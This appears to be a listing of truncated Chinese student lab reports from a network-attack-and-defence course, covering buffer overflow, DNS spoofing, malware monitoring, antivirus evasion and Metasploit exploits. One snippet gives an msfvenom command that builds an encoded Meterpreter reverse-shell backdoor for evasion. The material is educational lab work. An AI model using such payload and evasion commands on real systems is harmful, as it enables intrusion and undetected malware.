20155327李百乾<网络对抗>逆向及Bof基础 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell.正常情况下这个代码是不会被运行的.我们实践的目标就是想办法运行这个代码片段.我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode. -- 三个实践内容如下: 手工修改可执行文件,改变程序执…
20155327 李百乾 Exp7 网络欺诈防范 基础问题回答 (1)通常在什么场景下容易受到DNS spoof攻击 就此次试验来看,被收到NDSspoof攻击,首先要被攻击机扫描,并被设置为目标,所以这要求攻击机和靶机在同一个自网内.这种攻击在输入网址跳转到某个网页后,我发现上方输入栏的地址变成了靶机的IP,这点还是有点可疑的. 此外连接一些不需要密码的wifi后,可能为这种攻击创造条件. (2)在日常生活工作中如何防范以上两攻击方法 首先,不能乱连wifi,给攻击者可乘之机,其次,不要乱点一…
20155327 李百乾 Exp4 恶意代码分析 基础问题回答 (1)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所以想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些,用什么方法来监控. 我想了解的大概有 修改了哪些注册表 创建了哪些进程 占用了哪些端口 修改.查看了哪些文件 连接了哪些网络 监控方法: 可以定时让主机执行netstat然后分析,发现网络连接异常 可以利用Sysmon,编写配置文件,记录与自己关心的事件有关的系统日志 3(2)如果已经确定是某个程序或进程有问…
20155327李百乾 Exp3 免杀原理与实践 实践guocheng 一.Msfvenom使用编码器 1.利用(virustota)[https://www.virustotal.com/]检测实验二的后门程序 可见未经处理的后门程序被大多数软件识别出来. 2.用msf编码器对后门程序进行一次到多次的编码,看看是否对免杀有所作用. 十次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -…
实验内容 掌握metasploit的基本应用方式1.主动攻击——ms08_0672.针对浏览器的攻击——ms11_0503.针对客户端的攻击——Adobe4.成功应用一个辅助模块——scanner/discovery/arp_sweep&scanner/http/cert 实验问题回答 1.exploit就是发起渗透攻击,当你可以获得靶机shell或者做夺权的准备之后的一个run.2.payload就是我们在做渗透攻击中用到的shellcode,可以破坏程序正常运行的代码.3.encode就是伪…
20155201 李卓雯 <网络对抗技术>实验一 逆向及Bof基础 一.实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell.正常情况下这个代码是不会被运行的.我们实践的目标就是想办法运行这个代码片段.我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode. 三个实践内容如下: 手工修改可执行文…
网络对抗实验一 逆向及Bof基础实践 一.实验目的 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell.正常情况下这个代码是不会被运行的.我们实践的目标就是想办法运行这个代码片段.我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode. 三个实践内容如下: 手工修改可执行文件,改变程序执行流程,直接跳转到…
20145203盖泽双 <网络对抗技术> MAL_逆向与Bof基础 实践目标 (1)我们要通过修改程序代码,使得程序运行其自身中本不该运行的代码片段. (2)在这里,我们有一个名为20145203pwn1的linux可执行文件,该代码的执行流程为:main调用foo函数,foo函数会简单回显任何用户输入的字符串.我们要想办法运行该程序中包含的另一个代码片段--getShell,并返回一个可用Shell. 实现思路 (1)强行修改程序执行流:手工修改可执行文件,改变程序执行流程,直接跳转到get…
20145308 <网络对抗> 逆向及BOF基础实践 学习总结 实践目的 通过两种方法,实现程序能够运行原本并不会被运行的代码 实践原理 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数 知识点学习总结 汇编.机器指令 汇编指令与机器指令一一对应 EIP.指令地址 %eip存储指向下一条要执行的指令的地址 %ebp存储栈底指针,栈基址 %esp存储栈顶指针,始终指向栈顶 ESP存储栈…
20145236<网络对抗>Exp 1逆向及Bof基础 一.实践目标 运行原本不可访问的代码片段 强行修改程序执行流 以及注入运行任意代码. 二.基础知识及实践准备 理解EIP寄存器及其功能 IP是指令寄存器,存放当前指令的下一条指令的地址. CPU该执行哪条指令就是通过IP来指示的. EIP是32位机的指令寄存器. 理解汇编语言中call指令的功能 具体可参考此博客:汇编语言call和ret指令的具体执行 关于缓冲区溢出攻击 缓冲区溢出攻击这个名词想必大家都不陌生,但是具体的应用大多数人却是…